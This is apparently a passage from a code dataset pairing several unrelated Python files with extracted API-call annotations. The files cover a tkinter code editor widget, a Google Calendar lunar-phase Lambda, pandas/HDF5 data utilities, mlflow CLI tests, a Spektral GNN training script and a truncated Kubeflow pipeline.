[((190, 217), 'hashlib.sha224', 'hashlib.sha224', (['encoded_str'], {}), '(encoded_str)\n', (204, 217), False, 'import hashlib\n'), ((247, 274), 'hashlib.sha256', 'hashlib.sha256', (['encoded_str'], {}), '(encoded_str)\n', (261, 274), False, 'import hashlib\n'), ((304, 331), 'hashlib.sha384', 'hashlib.sha384', (['encoded_str'], {}), '(encoded_str)\n', (318, 331), False, 'import hashlib\n'), ((361, 388), 'hashlib.sha512', 'hashlib.sha512', (['encoded_str'], {}), '(encoded_str)\n', (375, 388), False, 'import hashlib\n')]
|
from .widget import Widget
import tkinter as tk
from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox
from tkinter.constants import RIGHT, LEFT, Y, BOTH
from tkinter.font import Font, BOLD, nametofont
from .scroll_frame import AutoScrollbar
from pygments.styles import get_style_by_name
from pygments.lexers import get_lexer_by_name
from ttkwidgets.autocomplete import AutocompleteEntryListbox
class ScrolledText(Text):
def __init__(self, master=None, **kw):
self.frame = Frame(master)
self.vbar = AutoScrollbar(self.frame, orient="vertical")
self.vbar.grid(row=0, column=1, sticky="ns")
self.frame.grid_columnconfigure(0, weight=1)
self.frame.grid_columnconfigure(1, weight=0)
self.frame.grid_rowconfigure(0, weight=1)
kw.update({'yscrollcommand': self.vbar.set})
Text.__init__(self, self.frame, **kw)
self.vbar['command'] = self.yview
Text.grid(self, row=0, column=0, sticky="news")
# Copy geometry methods of self.frame without overriding Text
# methods -- hack!
text_meths = vars(Text).keys()
methods = vars(Pack).keys() | vars(Grid).keys() | vars(Place).keys()
methods = methods.difference(text_meths)
for m in methods:
if m[0] != '_' and m != 'config' and m != 'configure' and m not in ["grid", "pack"]:
setattr(self, m, getattr(self.frame, m))
def __str__(self):
return str(self.frame)
def pack(self, *args, **kwargs):
self.frame.pack(*args, **kwargs)
#self.frame.pack_propagate(False)
def grid(self, *args, **kwargs):
self.frame.grid(*args, **kwargs)
class TextArea(Widget):
def __init__(self, master, **kwargs):
super().__init__(tk=ScrolledText(master=master, wrap=tk.WORD), **kwargs)
self._spaces = ' '
self._lexer = None
self._lexer_style = None
self._autocomplete_list = None
self._tk.bind('<KeyRelease>', self._set_data)
self._tk.bind('<Tab>', self._tab_to_spaces)
self._tk.bind('<Return>', self._autoindent)
self._tk.bind("<Control-KeyRelease-plus>", self._increase_size)
self._tk.bind("<Control-KeyRelease-minus>", self._decrease_size)
self._tk.bind("<Control-KeyRelease-space>", self._autocomplete)
self._value_setter = self.connect_to_prop("value", self.on_changed_value)
self.connect_to_prop("spaces", self._on_changed_spaces)
self.connect_to_prop("language", self._on_changed_language)
self.connect_to_prop("highlightstyle", self._on_changed_highlightstyle)
self.connect_to_prop("autocomplete", self._on_changed_autocomplete)
def _on_changed_autocomplete(self, value):
self._autocomplete_list = value
def _autocomplete(self, event):
if not self._autocomplete_list or len(self._autocomplete_list) == 0:
return
index = self._tk.index(INSERT).split(".")
self._text_index = '.'.join(index)
tw = Toplevel(self._tk)
tw.wm_overrideredirect(True)
font = self._get_font()
font_size = int(font.cget("size"))
tw.geometry(f"+{ self._tk.winfo_rootx() + int(index[1]) * int(font_size / 2) }+{ self._tk.winfo_rooty() + int(index[0]) * font_size }")
self._listbox = AutocompleteEntryListbox(tw, font=font, allow_other_values=False, completevalues=[v["name"] for v in self._autocomplete_list])
self._listbox.pack()
tw.lift()
tw.focus_force()
tw.grab_set()
tw.grab_release()
self._listbox.focus_force()
self._listbox.listbox.bind("<Double-Button-1>", self._autocomplete_selected)
self._listbox.entry.bind("<Return>", self._autocomplete_selected)
self._listbox.bind("<Leave>", self._autocomplete_destroy)
self._listbox.bind("<Escape>", self._autocomplete_destroy)
self._autocomplete_window = tw
def _autocomplete_selected(self, event):
value = next(v["value"] for v in self._autocomplete_list if v["name"] == self._listbox.get())
self._tk.insert(self._text_index, value)
self._listbox.event_generate("<Leave>")
def _autocomplete_destroy(self, event):
if self._autocomplete_window:
self._autocomplete_window.destroy()
self._autocomplete_window = None
self._tk.focus_force()
self._tk.mark_set("insert", self._text_index)
def _get_font(self):
return nametofont(self.get_style_attr('font'))
def _increase_size(self, event):
font = self._get_font()
font.configure(size=int(font.cget("size") + 1))
#self._tk.configure(font=font)
def _decrease_size(self, event):
font = self._get_font()
font.configure(size=int(font.cget("size") - 1))
#self._tk.configure(font=font)
def _highlight(self):
if not self._lexer:
return
code = self._get_text()
self._tk.mark_set("range_start", "1" + ".0")
for token, value in self._lexer.get_tokens(code):
if len(value) == 0:
continue
self._tk.mark_set("range_end", "range_start + %dc" % len(value))
self._tk.tag_add(str(token), "range_start", "range_end")
self._tk.mark_set("range_start", "range_end")
def _on_changed_highlightstyle(self, value):
self._lexer_style = get_style_by_name(value)
self._tk.configure(
background=self._lexer_style.background_color,
insertbackground=self._lexer_style.highlight_color,
foreground=self._lexer_style.highlight_color)
for tag in self._tk.tag_names():
self._tk.tag_delete(tag)
for token, value in self._lexer_style.styles.items():
token_value = value.split(' ')
foreground = list(filter(lambda x: x.startswith("#"), token_value))
if len(foreground) == 0:
continue
if str(token) == "Token.Text":
self._tk.configure(
insertbackground=foreground[0],
foreground=foreground[0])
self._tk.tag_configure(str(token), foreground=foreground[0])
self._highlight()
def _on_changed_language(self, value):
if value:
self._lexer = get_lexer_by_name(value)
def _on_changed_spaces(self, value):
self._spaces = ''.join([" "] * int(value))
def _autoindent(self, event):
indentation = ""
lineindex = self._tk.index("insert").split(".")[0]
linetext = self._tk.get(lineindex+".0", lineindex+".end")
for character in linetext:
if character in [" ","\t"]:
indentation += character
else:
break
self._tk.insert(self._tk.index("insert"), "\n"+indentation)
return "break"
def _tab_to_spaces(self, event):
self._tk.insert(self._tk.index("insert"), self._spaces)
return "break"
    def _get_text(self):
        return self._tk.get("1.0", tk.END)[:-1]  # drop the trailing newline Tk appends
def _set_data(self, event):
if self._value_setter:
self._value_setter(self._get_text())
def on_changed_value(self, value):
if value:
index = self._tk.index(tk.INSERT)
self._tk.delete("1.0", tk.END)
self._tk.insert(tk.END, value)
self._tk.mark_set("insert", index)
self._tk.see(index)
self._highlight()
def on_disposed(self):
self._tk.unbind('<KeyRelease>')
|
[
"tkinter.Text.__init__",
"tkinter.Text.grid",
"pygments.lexers.get_lexer_by_name",
"tkinter.Toplevel",
"ttkwidgets.autocomplete.AutocompleteEntryListbox",
"tkinter.Frame",
"pygments.styles.get_style_by_name"
] |
[((598, 611), 'tkinter.Frame', 'Frame', (['master'], {}), '(master)\n', (603, 611), False, 'from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox\n'), ((928, 965), 'tkinter.Text.__init__', 'Text.__init__', (['self', 'self.frame'], {}), '(self, self.frame, **kw)\n', (941, 965), False, 'from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox\n'), ((1010, 1057), 'tkinter.Text.grid', 'Text.grid', (['self'], {'row': '(0)', 'column': '(0)', 'sticky': '"""news"""'}), "(self, row=0, column=0, sticky='news')\n", (1019, 1057), False, 'from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox\n'), ((3004, 3022), 'tkinter.Toplevel', 'Toplevel', (['self._tk'], {}), '(self._tk)\n', (3012, 3022), False, 'from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox\n'), ((3294, 3424), 'ttkwidgets.autocomplete.AutocompleteEntryListbox', 'AutocompleteEntryListbox', (['tw'], {'font': 'font', 'allow_other_values': '(False)', 'completevalues': "[v['name'] for v in self._autocomplete_list]"}), "(tw, font=font, allow_other_values=False,\n completevalues=[v['name'] for v in self._autocomplete_list])\n", (3318, 3424), False, 'from ttkwidgets.autocomplete import AutocompleteEntryListbox\n'), ((5280, 5304), 'pygments.styles.get_style_by_name', 'get_style_by_name', (['value'], {}), '(value)\n', (5297, 5304), False, 'from pygments.styles import get_style_by_name\n'), ((6140, 6164), 'pygments.lexers.get_lexer_by_name', 'get_lexer_by_name', (['value'], {}), '(value)\n', (6157, 6164), False, 'from pygments.lexers import get_lexer_by_name\n')]
|
import json
from datetime import datetime, timedelta
import requests
import os.path
import boto3
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
# If modifying these scopes, delete the file credentials.json.
SCOPES = ['https://www.googleapis.com/auth/calendar']
CREDENTIALS_FILE = 'credentials.json'
s3 = boto3.client("s3")
s3_bucket = os.environ["BUCKET"]
def create_event(event, context):
month = datetime.now().month
year = datetime.now().year
service = get_calendar_service()
phases = requests.get(f"https://www.icalendar37.net/lunar/api/?lang=fr&month={month}&year={year}").json()["phase"]
for day_number in phases:
phase = phases[day_number]["npWidget"]
day = datetime(year, month, int(day_number))
start = (day + timedelta(hours=18)).isoformat()
end = (day + timedelta(hours=18, minutes=30)).isoformat()
service.events().insert(calendarId='primary',
body={
"summary": phase,
"start": {"dateTime": start, "timeZone": 'Europe/Brussels'},
"end": {"dateTime": end, "timeZone": 'Europe/Brussels'},
}
).execute()
def get_calendar_service():
creds = None
obj = s3.get_object(Bucket=s3_bucket, Key=CREDENTIALS_FILE)
    creds_info = json.load(obj['Body'])  # read the S3 stream once; it cannot be re-read below
    creds = Credentials.from_authorized_user_info(creds_info, SCOPES)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired:
creds.refresh(Request())
else:
            flow = InstalledAppFlow.from_client_config(
                creds_info, SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
s3.put_object(Bucket=s3_bucket, Key=CREDENTIALS_FILE, Body=creds.to_json())
service = build('calendar', 'v3', credentials=creds)
return service
if __name__ == '__main__':
create_event("salut", "coucou")
# Create credentials file
# service = get_calendar_service()
|
[
"json.load",
"google.auth.transport.requests.Request",
"boto3.client",
"datetime.timedelta",
"googleapiclient.discovery.build",
"requests.get",
"datetime.datetime.now"
] |
[((461, 479), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (473, 479), False, 'import boto3\n'), ((2132, 2174), 'googleapiclient.discovery.build', 'build', (['"""calendar"""', '"""v3"""'], {'credentials': 'creds'}), "('calendar', 'v3', credentials=creds)\n", (2137, 2174), False, 'from googleapiclient.discovery import build\n'), ((561, 575), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (573, 575), False, 'from datetime import datetime, timedelta\n'), ((593, 607), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (605, 607), False, 'from datetime import datetime, timedelta\n'), ((1600, 1622), 'json.load', 'json.load', (["obj['Body']"], {}), "(obj['Body'])\n", (1609, 1622), False, 'import json\n'), ((664, 763), 'requests.get', 'requests.get', (['f"""https://www.icalendar37.net/lunar/api/?lang=fr&month={month}&year={year}"""'], {}), "(\n f'https://www.icalendar37.net/lunar/api/?lang=fr&month={month}&year={year}'\n )\n", (676, 763), False, 'import requests\n'), ((1805, 1814), 'google.auth.transport.requests.Request', 'Request', ([], {}), '()\n', (1812, 1814), False, 'from google.auth.transport.requests import Request\n'), ((1902, 1924), 'json.load', 'json.load', (["obj['Body']"], {}), "(obj['Body'])\n", (1911, 1924), False, 'import json\n'), ((924, 943), 'datetime.timedelta', 'timedelta', ([], {'hours': '(18)'}), '(hours=18)\n', (933, 943), False, 'from datetime import datetime, timedelta\n'), ((978, 1009), 'datetime.timedelta', 'timedelta', ([], {'hours': '(18)', 'minutes': '(30)'}), '(hours=18, minutes=30)\n', (987, 1009), False, 'from datetime import datetime, timedelta\n')]
|
__doc__ = """
Various data utilities.
"""
####################################################################
# Packages
####################################################################
import os
import h5py
import numpy as np
import pandas as pd
####################################################################
# Globals/Constants
####################################################################
PROJECT_DIR = os.path.dirname(
os.path.dirname(
os.path.realpath(__file__)))
DATA_DIR = os.path.join(PROJECT_DIR, 'data')
TRAIN_DATA_FILE = os.path.join(DATA_DIR, 'train.h5')
####################################################################
# Functions
####################################################################
def get_data(path=None):
if path:
data_set = DataSet(path)
else:
data_set = DataSet(TRAIN_DATA_FILE)
return data_set
####################################################################
# Classes
####################################################################
class DataSet(object):
"""class for dataset processing"""
def __init__(self, path=TRAIN_DATA_FILE):
self.path = path
self.data_dict = self._get_data_dict()
self.df = self._get_df()
def _get_data_dict(self):
with h5py.File(self.path,'r') as hf:
train_hf = hf.get('train')
data_dict = { hf_key: np.array(train_hf.get(hf_key))
for hf_key in train_hf.keys()}
return data_dict
def _get_df(self):
with pd.HDFStore(self.path, "r") as train:
df = train.get("train")
return df
def __repr__(self):
sets = [ "{}: {}".format(key,data_set.shape)
for key, data_set in
                 self.data_dict.items()]  # dict.iteritems() existed only in Python 2
return "; ".join(sets)
def keys(self):
return self.data_dict.keys()
def get(self, key):
return self.data_dict.get(key, None)
def to_df(self):
return self.df
def get_batch(self, slice_index, batch_size, columns=None, random=False):
if random:
samples = self.df.sample(n=batch_size)
else:
num_samples = self.df.shape[0]
if (slice_index+1)*batch_size >= num_samples:
print("Slice is out of range. Taking last batch_size slice")
sample_range = (num_samples - batch_size, num_samples)
else:
sample_range = (slice_index*batch_size, (slice_index+1)*batch_size)
samples = self.df[sample_range[0] : sample_range[1]]
samples_matrix = np.array(samples.as_matrix(columns=columns)) if columns else np.array(samples.as_matrix())
return samples_matrix
def get_numpy_data(self):
df = self.df
means = []
stds = []
# Assuming column order remains consistent throughout the class
for col in df.columns:
if col not in ['y', 'timestamp', 'index', 'id']:
data = df[col].dropna().as_matrix()
means.append(np.mean(data))
stds.append(np.std(data))
col_means = np.array(means)
col_stds = np.array(stds)
# Ensure values are sorted by time
df = df.sort_values(by=['id', 'timestamp'], ascending=True)
max_seq_len_raw = 1820
# Simply mean-fill missing values for now
df = df.fillna(df.mean())
ids = np.unique(df['id'].as_matrix())
examples = []
targets = []
weights = []
for id in ids:
slice = df[df.id == id]
num_timesteps = slice.shape[0]
#y = slice['y'].as_matrix()
# Pad df to max seq len
padded = slice.reset_index().reindex(range(max_seq_len_raw),
fill_value=0)
target = padded['y'].as_matrix()
padded.drop('y', axis=1, inplace=True)
padded.drop('timestamp', axis=1, inplace=True)
padded.drop('index', axis=1, inplace=True)
padded.drop('id', axis=1, inplace=True)
example = padded.as_matrix()
examples.append(example)
targets.append(target)
weight = [1]*num_timesteps + [0]*(max_seq_len_raw - num_timesteps)
weights.append(weight)
examples = np.array(examples)
targets = np.array(targets)
weights = np.array(weights)
# Normalize the data
examples = (examples - col_means)/col_stds
# TODO: Supply these outside the function later: col_means, col_stds
return examples, targets, weights
def split_valid(self, examples, targets, weights, valid_split_ratio=0.5):
"""
Args:
            valid_split_ratio: float in [0, 1]; fraction of data reserved
            for validation. Note that two validation sets are reserved: some
            ids are held out entirely for validation, and the latter timesteps
            of sequences used in training are also used in validation.
"""
num_ids = examples.shape[0]
valid_num = int(round(num_ids*valid_split_ratio))
examples_train_pre = examples[:-valid_num]
targets_train_pre = targets[:-valid_num]
weights_train_pre = weights[:-valid_num]
examples_valid = examples[-valid_num:]
targets_valid = targets[-valid_num:]
weights_valid = weights[-valid_num:]
examples_train = []
targets_train = []
weights_train = []
examples_train_valid = []
targets_train_valid = []
weights_train_valid = []
valid_len = 300 # Hardcoded for now
for arr1, arr2, arr3 in zip(examples_train_pre, targets_train_pre,
weights_train_pre):
examples_train.append(arr1[:-valid_len])
targets_train.append(arr2[:-valid_len])
weights_train.append(arr3[:-valid_len])
examples_train_valid.append(arr1[-valid_len:])
targets_train_valid.append(arr2[-valid_len:])
weights_train_valid.append(arr3[-valid_len:])
trainset = (np.array(examples_train), np.array(targets_train),
np.array(weights_train))
train_validset = (np.array(examples_train_valid),
np.array(targets_train_valid),
np.array(weights_train_valid))
validset = (examples_valid, targets_valid, weights_valid)
return trainset, train_validset, validset
def get_numpy_batch(self, dataset, batch_size, seq_len):
examples = []
targets = []
weights = []
#for _ in range(batch_size):
while len(targets) < batch_size:
# Sample a random id
idx = np.random.choice(range(dataset[0].shape[0]))
# Take random slice
max_seq_len = dataset[0][idx].shape[0]
assert max_seq_len >= seq_len
slice = np.random.choice(range(max_seq_len - seq_len))
# Let's just go with full length for now
w = dataset[2][idx][slice:slice+seq_len]
if np.sum(w) != len(w):
continue
examples.append(dataset[0][idx][slice:slice+seq_len])
targets.append(dataset[1][idx][slice:slice+seq_len])
weights.append(w)
return np.array(examples), np.array(targets), np.array(weights)
|
[
"h5py.File",
"pandas.HDFStore",
"numpy.sum",
"numpy.std",
"os.path.realpath",
"numpy.mean",
"numpy.array",
"os.path.join"
] |
[((545, 578), 'os.path.join', 'os.path.join', (['PROJECT_DIR', '"""data"""'], {}), "(PROJECT_DIR, 'data')\n", (557, 578), False, 'import os\n'), ((597, 631), 'os.path.join', 'os.path.join', (['DATA_DIR', '"""train.h5"""'], {}), "(DATA_DIR, 'train.h5')\n", (609, 631), False, 'import os\n'), ((505, 531), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (521, 531), False, 'import os\n'), ((3229, 3244), 'numpy.array', 'np.array', (['means'], {}), '(means)\n', (3237, 3244), True, 'import numpy as np\n'), ((3264, 3278), 'numpy.array', 'np.array', (['stds'], {}), '(stds)\n', (3272, 3278), True, 'import numpy as np\n'), ((4506, 4524), 'numpy.array', 'np.array', (['examples'], {}), '(examples)\n', (4514, 4524), True, 'import numpy as np\n'), ((4543, 4560), 'numpy.array', 'np.array', (['targets'], {}), '(targets)\n', (4551, 4560), True, 'import numpy as np\n'), ((4579, 4596), 'numpy.array', 'np.array', (['weights'], {}), '(weights)\n', (4587, 4596), True, 'import numpy as np\n'), ((1335, 1360), 'h5py.File', 'h5py.File', (['self.path', '"""r"""'], {}), "(self.path, 'r')\n", (1344, 1360), False, 'import h5py\n'), ((1596, 1623), 'pandas.HDFStore', 'pd.HDFStore', (['self.path', '"""r"""'], {}), "(self.path, 'r')\n", (1607, 1623), True, 'import pandas as pd\n'), ((6397, 6421), 'numpy.array', 'np.array', (['examples_train'], {}), '(examples_train)\n', (6405, 6421), True, 'import numpy as np\n'), ((6423, 6446), 'numpy.array', 'np.array', (['targets_train'], {}), '(targets_train)\n', (6431, 6446), True, 'import numpy as np\n'), ((6500, 6523), 'numpy.array', 'np.array', (['weights_train'], {}), '(weights_train)\n', (6508, 6523), True, 'import numpy as np\n'), ((6551, 6581), 'numpy.array', 'np.array', (['examples_train_valid'], {}), '(examples_train_valid)\n', (6559, 6581), True, 'import numpy as np\n'), ((6631, 6660), 'numpy.array', 'np.array', (['targets_train_valid'], {}), '(targets_train_valid)\n', (6639, 6660), True, 'import numpy as np\n'), ((6710, 6739), 'numpy.array', 'np.array', (['weights_train_valid'], {}), '(weights_train_valid)\n', (6718, 6739), True, 'import numpy as np\n'), ((7756, 7774), 'numpy.array', 'np.array', (['examples'], {}), '(examples)\n', (7764, 7774), True, 'import numpy as np\n'), ((7776, 7793), 'numpy.array', 'np.array', (['targets'], {}), '(targets)\n', (7784, 7793), True, 'import numpy as np\n'), ((7795, 7812), 'numpy.array', 'np.array', (['weights'], {}), '(weights)\n', (7803, 7812), True, 'import numpy as np\n'), ((7520, 7529), 'numpy.sum', 'np.sum', (['w'], {}), '(w)\n', (7526, 7529), True, 'import numpy as np\n'), ((3147, 3160), 'numpy.mean', 'np.mean', (['data'], {}), '(data)\n', (3154, 3160), True, 'import numpy as np\n'), ((3190, 3202), 'numpy.std', 'np.std', (['data'], {}), '(data)\n', (3196, 3202), True, 'import numpy as np\n')]
|
from click.testing import CliRunner
from unittest import mock
import numpy as np
import os
import pandas as pd
import shutil
import tempfile
import textwrap
from mlflow import experiments
from mlflow.runs import list_run
import mlflow
def test_list_run():
with mlflow.start_run(run_name="apple"):
pass
result = CliRunner().invoke(list_run, ["--experiment-id", "0"])
assert "apple" in result.output
def test_list_run_experiment_id_required():
result = CliRunner().invoke(list_run, [])
assert "Missing option '--experiment-id'" in result.output
def test_csv_generation():
with mock.patch("mlflow.experiments.fluent.search_runs") as mock_search_runs:
mock_search_runs.return_value = pd.DataFrame(
{
"run_id": np.array(["all_set", "with_none", "with_nan"]),
"experiment_id": np.array([1, 1, 1]),
"param_optimizer": np.array(["Adam", None, "Adam"]),
"avg_loss": np.array([42.0, None, np.nan], dtype=np.float32),
},
columns=["run_id", "experiment_id", "param_optimizer", "avg_loss"],
)
expected_csv = textwrap.dedent(
"""\
run_id,experiment_id,param_optimizer,avg_loss
all_set,1,Adam,42.0
with_none,1,,
with_nan,1,Adam,
"""
)
tempdir = tempfile.mkdtemp()
try:
result_filename = os.path.join(tempdir, "result.csv")
CliRunner().invoke(
experiments.generate_csv_with_runs,
["--experiment-id", "1", "--filename", result_filename],
)
with open(result_filename, "r") as fd:
assert expected_csv == fd.read()
finally:
shutil.rmtree(tempdir)
|
[
"textwrap.dedent",
"mlflow.start_run",
"unittest.mock.patch",
"tempfile.mkdtemp",
"numpy.array",
"shutil.rmtree",
"click.testing.CliRunner",
"os.path.join"
] |
[((270, 304), 'mlflow.start_run', 'mlflow.start_run', ([], {'run_name': '"""apple"""'}), "(run_name='apple')\n", (286, 304), False, 'import mlflow\n'), ((616, 667), 'unittest.mock.patch', 'mock.patch', (['"""mlflow.experiments.fluent.search_runs"""'], {}), "('mlflow.experiments.fluent.search_runs')\n", (626, 667), False, 'from unittest import mock\n'), ((1160, 1330), 'textwrap.dedent', 'textwrap.dedent', (['""" run_id,experiment_id,param_optimizer,avg_loss\n all_set,1,Adam,42.0\n with_none,1,,\n with_nan,1,Adam,\n """'], {}), '(\n """ run_id,experiment_id,param_optimizer,avg_loss\n all_set,1,Adam,42.0\n with_none,1,,\n with_nan,1,Adam,\n """\n )\n', (1175, 1330), False, 'import textwrap\n'), ((1363, 1381), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (1379, 1381), False, 'import tempfile\n'), ((332, 343), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (341, 343), False, 'from click.testing import CliRunner\n'), ((482, 493), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (491, 493), False, 'from click.testing import CliRunner\n'), ((1425, 1460), 'os.path.join', 'os.path.join', (['tempdir', '"""result.csv"""'], {}), "(tempdir, 'result.csv')\n", (1437, 1460), False, 'import os\n'), ((1761, 1783), 'shutil.rmtree', 'shutil.rmtree', (['tempdir'], {}), '(tempdir)\n', (1774, 1783), False, 'import shutil\n'), ((783, 829), 'numpy.array', 'np.array', (["['all_set', 'with_none', 'with_nan']"], {}), "(['all_set', 'with_none', 'with_nan'])\n", (791, 829), True, 'import numpy as np\n'), ((864, 883), 'numpy.array', 'np.array', (['[1, 1, 1]'], {}), '([1, 1, 1])\n', (872, 883), True, 'import numpy as np\n'), ((920, 952), 'numpy.array', 'np.array', (["['Adam', None, 'Adam']"], {}), "(['Adam', None, 'Adam'])\n", (928, 952), True, 'import numpy as np\n'), ((982, 1030), 'numpy.array', 'np.array', (['[42.0, None, np.nan]'], {'dtype': 'np.float32'}), '([42.0, None, np.nan], dtype=np.float32)\n', (990, 1030), True, 'import numpy as np\n'), ((1473, 1484), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1482, 1484), False, 'from click.testing import CliRunner\n')]
|
"""
This example implements the model from the paper
> [Design Space for Graph Neural Networks](https://arxiv.org/abs/2011.08843)<br>
> <NAME>, <NAME>, <NAME>
using the PROTEINS dataset.
The configuration at the top of the file is the best one identified in the
paper, and should work well for many different datasets without changes.
Note: the results reported in the paper are averaged over 3 random repetitions
with an 80/20 split.
"""
import numpy as np
import tensorflow as tf
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import categorical_accuracy
from tensorflow.keras.optimizers import Adam
from spektral.data import DisjointLoader
from spektral.datasets import TUDataset
from spektral.models import GeneralGNN
physical_devices = tf.config.list_physical_devices("GPU")
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
################################################################################
# Config
################################################################################
batch_size = 32
learning_rate = 0.01
epochs = 400
################################################################################
# Load data
################################################################################
data = TUDataset("PROTEINS")
# Train/test split
np.random.shuffle(data)
split = int(0.8 * len(data))
data_tr, data_te = data[:split], data[split:]
# Data loaders
loader_tr = DisjointLoader(data_tr, batch_size=batch_size, epochs=epochs)
loader_te = DisjointLoader(data_te, batch_size=batch_size)
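# Note: `epochs` is passed to the training loader, so iterating it yields
# batches for that many epochs; the manual loop below detects epoch boundaries
# with steps_per_epoch.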
################################################################################
# Build model
################################################################################
model = GeneralGNN(data.n_labels, activation="softmax")
optimizer = Adam(learning_rate)
loss_fn = CategoricalCrossentropy()
################################################################################
# Fit model
################################################################################
@tf.function(input_signature=loader_tr.tf_signature(), experimental_relax_shapes=True)
def train_step(inputs, target):
with tf.GradientTape() as tape:
predictions = model(inputs, training=True)
loss = loss_fn(target, predictions) + sum(model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
acc = tf.reduce_mean(categorical_accuracy(target, predictions))
return loss, acc
def evaluate(loader):
output = []
step = 0
while step < loader.steps_per_epoch:
step += 1
inputs, target = loader.__next__()
pred = model(inputs, training=False)
outs = (
loss_fn(target, pred),
tf.reduce_mean(categorical_accuracy(target, pred)),
len(target), # Keep track of batch size
)
output.append(outs)
if step == loader.steps_per_epoch:
output = np.array(output)
return np.average(output[:, :-1], 0, weights=output[:, -1])
epoch = step = 0
results = []
for batch in loader_tr:
step += 1
loss, acc = train_step(*batch)
results.append((loss, acc))
if step == loader_tr.steps_per_epoch:
step = 0
epoch += 1
results_te = evaluate(loader_te)
print(
"Ep. {} - Loss: {:.3f} - Acc: {:.3f} - Test loss: {:.3f} - Test acc: {:.3f}".format(
epoch, *np.mean(results, 0), *results_te
)
)
results = []
################################################################################
# Evaluate model
################################################################################
results_te = evaluate(loader_te)
print("Final results - Loss: {:.3f} - Acc: {:.3f}".format(*results_te))
|
[
"numpy.average",
"tensorflow.config.list_physical_devices",
"spektral.data.DisjointLoader",
"spektral.datasets.TUDataset",
"tensorflow.config.experimental.set_memory_growth",
"tensorflow.keras.losses.CategoricalCrossentropy",
"numpy.mean",
"tensorflow.keras.optimizers.Adam",
"tensorflow.keras.metrics.categorical_accuracy",
"numpy.array",
"spektral.models.GeneralGNN",
"tensorflow.GradientTape",
"numpy.random.shuffle"
] |
[((798, 836), 'tensorflow.config.list_physical_devices', 'tf.config.list_physical_devices', (['"""GPU"""'], {}), "('GPU')\n", (829, 836), True, 'import tensorflow as tf\n'), ((1343, 1364), 'spektral.datasets.TUDataset', 'TUDataset', (['"""PROTEINS"""'], {}), "('PROTEINS')\n", (1352, 1364), False, 'from spektral.datasets import TUDataset\n'), ((1385, 1408), 'numpy.random.shuffle', 'np.random.shuffle', (['data'], {}), '(data)\n', (1402, 1408), True, 'import numpy as np\n'), ((1512, 1573), 'spektral.data.DisjointLoader', 'DisjointLoader', (['data_tr'], {'batch_size': 'batch_size', 'epochs': 'epochs'}), '(data_tr, batch_size=batch_size, epochs=epochs)\n', (1526, 1573), False, 'from spektral.data import DisjointLoader\n'), ((1586, 1632), 'spektral.data.DisjointLoader', 'DisjointLoader', (['data_te'], {'batch_size': 'batch_size'}), '(data_te, batch_size=batch_size)\n', (1600, 1632), False, 'from spektral.data import DisjointLoader\n'), ((1818, 1865), 'spektral.models.GeneralGNN', 'GeneralGNN', (['data.n_labels'], {'activation': '"""softmax"""'}), "(data.n_labels, activation='softmax')\n", (1828, 1865), False, 'from spektral.models import GeneralGNN\n'), ((1878, 1897), 'tensorflow.keras.optimizers.Adam', 'Adam', (['learning_rate'], {}), '(learning_rate)\n', (1882, 1897), False, 'from tensorflow.keras.optimizers import Adam\n'), ((1908, 1933), 'tensorflow.keras.losses.CategoricalCrossentropy', 'CategoricalCrossentropy', ([], {}), '()\n', (1931, 1933), False, 'from tensorflow.keras.losses import CategoricalCrossentropy\n'), ((871, 938), 'tensorflow.config.experimental.set_memory_growth', 'tf.config.experimental.set_memory_growth', (['physical_devices[0]', '(True)'], {}), '(physical_devices[0], True)\n', (911, 938), True, 'import tensorflow as tf\n'), ((2238, 2255), 'tensorflow.GradientTape', 'tf.GradientTape', ([], {}), '()\n', (2253, 2255), True, 'import tensorflow as tf\n'), ((2541, 2582), 'tensorflow.keras.metrics.categorical_accuracy', 'categorical_accuracy', (['target', 'predictions'], {}), '(target, predictions)\n', (2561, 2582), False, 'from tensorflow.keras.metrics import categorical_accuracy\n'), ((3076, 3092), 'numpy.array', 'np.array', (['output'], {}), '(output)\n', (3084, 3092), True, 'import numpy as np\n'), ((3112, 3164), 'numpy.average', 'np.average', (['output[:, :-1]', '(0)'], {'weights': 'output[:, -1]'}), '(output[:, :-1], 0, weights=output[:, -1])\n', (3122, 3164), True, 'import numpy as np\n'), ((2884, 2918), 'tensorflow.keras.metrics.categorical_accuracy', 'categorical_accuracy', (['target', 'pred'], {}), '(target, pred)\n', (2904, 2918), False, 'from tensorflow.keras.metrics import categorical_accuracy\n'), ((3557, 3576), 'numpy.mean', 'np.mean', (['results', '(0)'], {}), '(results, 0)\n', (3564, 3576), True, 'import numpy as np\n')]
|
import kfp.dsl as dsl
class ObjectDict(dict):
def __getattr__(self, name):
if name in self:
return self[name]
else:
raise AttributeError("No such attribute: " + name)
@dsl.pipeline(
name='fashion mnist',
description='Train and Deploy Fashion MNIST'
)
def train_and_deploy(
download_and_preprocess="full"
):
# Step 1: download and store data in pipeline
download = dsl.ContainerOp(
name='download',
# image needs to be a compile-time string
image='docker.io/dotnetderek/download:latest',
arguments=[
download_and_preprocess
],
file_outputs={
'trainImages':'/trainImagesObjectName.txt',
'trainLabels':'/trainLabelsObjectName.txt',
'testImages':'/testImagesObjectName.txt',
